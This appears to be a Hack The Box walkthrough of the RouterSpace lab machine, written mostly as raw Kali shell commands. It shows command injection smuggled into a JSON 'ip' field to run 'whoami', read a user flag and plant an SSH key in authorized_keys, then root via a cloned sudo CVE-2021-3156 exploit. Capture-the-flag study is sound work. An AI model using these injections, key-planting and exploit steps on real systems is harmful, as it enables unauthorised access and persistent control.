Hack_The_Box_Writeups

HackTheBox – RouterSpace Walkthrough – In English

┌──(root㉿kali)-[/home/kali/Downloads]

└─# nmap -A 10.10.11.148

http://10.10.11.148

Click on download

┌──(root㉿kali)-[/home/kali/Downloads]

└─# file RouterSpace.apk

┌──(root㉿kali)-[/home/kali/Downloads]

└─# unzip RouterSpace.apk

┌──(root㉿kali)-[/home/kali/Downloads]

└─# apktool d RouterSpace.apk

Now scan the apk with mobsf.

┌──(root㉿kali)-[/home/kali/Downloads]

└─# cat /etc/hosts | grep 10.10.11.148

┌──(kali㉿kali)-[~/Downloads]

└─$ sudo apt install anbox

┌──(kali㉿kali)-[~/Downloads]

└─$ sudo modprobe ashmem_linux

┌──(kali㉿kali)-[~/Downloads]

└─$ sudo modprobe binder_linux

┌──(kali㉿kali)-[~/Downloads]

└─$ sudo /sbin/modprobe ashmem_linux

┌──(kali㉿kali)-[~/Downloads]└─$ wget https://build.anbox.io/android-images/2018/07/19/android_amd64.img

┌──(kali㉿kali)-[~/Downloads]

└─$ sudo mv android_amd64.img /var/lib/anbox/android.img

┌──(kali㉿kali)-[~/Downloads]

└─$ sudo service anbox-container-manager restart

┌──(kali㉿kali)-[~/Downloads]

└─$ anbox launch –package=org.anbox.appmgr –component=org.anbox.appmgr.AppViewActivity

┌──(root㉿kali)-[~kali/Downloads]

└─# apt install adb

┌──(root㉿kali)-[~kali/Downloads]

└─# adb devices

┌──(root㉿kali)-[~kali/Downloads]

└─# adb -s emulator-5558 install RouterSpace.apk

Now open

┌──(root㉿kali)-[/home/kali/Downloads]

└─# nc -nlvp 8000

┌──(kali㉿kali)-[~/Downloads]

└─$ adb shell settings put global http_proxy 10.10.14.102:8001

┌──(root㉿kali)-[~kali/Downloads]

└─# curl -X POST http://routerspace.htb/api/v4/monitoring/router/dev/check/deviceAccess -H ‘Content-Type: application/json’ -H “User-Agent: RouterSpaceAgent”

┌──(root㉿kali)-[~kali/Downloads]

└─# curl -X POST http://routerspace.htb/api/v4/monitoring/router/dev/check/deviceAccess -H ‘Content-Type: application/json’ -H “User-Agent: RouterSpaceAgent” -d ‘{“ip”:”127.0.0.1; whoami”}’

┌──(root㉿kali)-[~kali/Downloads]

└─# curl -X POST http://routerspace.htb/api/v4/monitoring/router/dev/check/deviceAccess -H ‘Content-Type: application/json’ -H “User-Agent: RouterSpaceAgent” -d ‘{“ip”:”127.0.0.1; cat /home/paul/user.txt”}’

┌──(root㉿kali)-[~kali/Downloads]

└─# cat /root/.ssh/id_rsa.pub 

┌──(root㉿kali)-[~kali/Downloads]

└─# curl -X POST http://routerspace.htb/api/v4/monitoring/router/dev/check/deviceAccess -H ‘Content-Type: application/json’ -H “User-Agent: RouterSpaceAgent” -d ‘{“ip”:”127.0.0.1; echo ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDCvP+2IenWNQ7HSl1woTSIVPw4OUquKtFcFzTvbnaWSih80RF7e6uI8B00G6aArS/4WLIPBbiXVDT9J0Dwe24Y0ppXKE/yCRRoAz3ND65/7bkLfWjlAx7nUPmQyIsIezBv1FXJLDjqs98l1Zuy0SYy8DhgJmZiuDkzoK2j8NuWDJTxLWGmhbtWtdGzPuAob/UvL/9sMBjKzN5KxWNsWDN7Xqr/YEmaBmBcw5TykWqjKj3wSoicERp39PhaujshS23csq1AMEcDMugni6CV4PNWW6bXhDAbc9KwyFBiqalAsoMxGgboL9FuuSdBaiYXNdy2o6DEaD9B55L2bFr21I5BpJ4vVvesomv6c32IUzseG35Q5ZZ4a4B28ezfKERBnr8PDkO1fvI9x6xynwWTmKBVjy/dCLXiiWz57kuwtMu5jGAWy7HTusTUQolrylC1ZhOgArEiVikFik5FtrXEDtFgKeXX2UCwsnd3fSVaKPN3jQXKNmG8F+pHb62arye8y0M= root@kali > /home/paul/.ssh/authorized_keys”}’

┌──(root㉿kali)-[/home/kali/Downloads]

└─# ssh -i /root/.ssh/id_rsa paul@routerspace.htb

https://github.com/mzet-/linux-exploit-suggester

┌──(root㉿kali)-[~kali/Downloads/linux-exploit-suggester]

└─# scp -i /root/.ssh/id_rsa linux-exploit-suggester.sh paul@routerspace.htb:/tmp

paul@routerspace:/tmp$ ./linux-exploit-suggester.sh

paul@routerspace:/tmp$ sudo –version

https://github.com/CptGibbon/CVE-2021-3156

┌──(root㉿kali)-[~kali/Downloads]

└─# git clone https://github.com/CptGibbon/CVE-2021-3156

┌──(root㉿kali)-[~kali/Downloads/CVE-2021-3156]

└─# scp -i /root/.ssh/id_rsa /home/kali/Downloads/CVE-2021-3156/* paul@routerspace.htb:/tmp

paul@routerspace:/tmp$ make

paul@routerspace:/tmp$ chmod 777 exploit

paul@routerspace:/tmp$ ./exploit

# cd /root

# cat root.txt 

Hi, I’m saksham dixit

Leave a Reply

Your email address will not be published. Required fields are marked *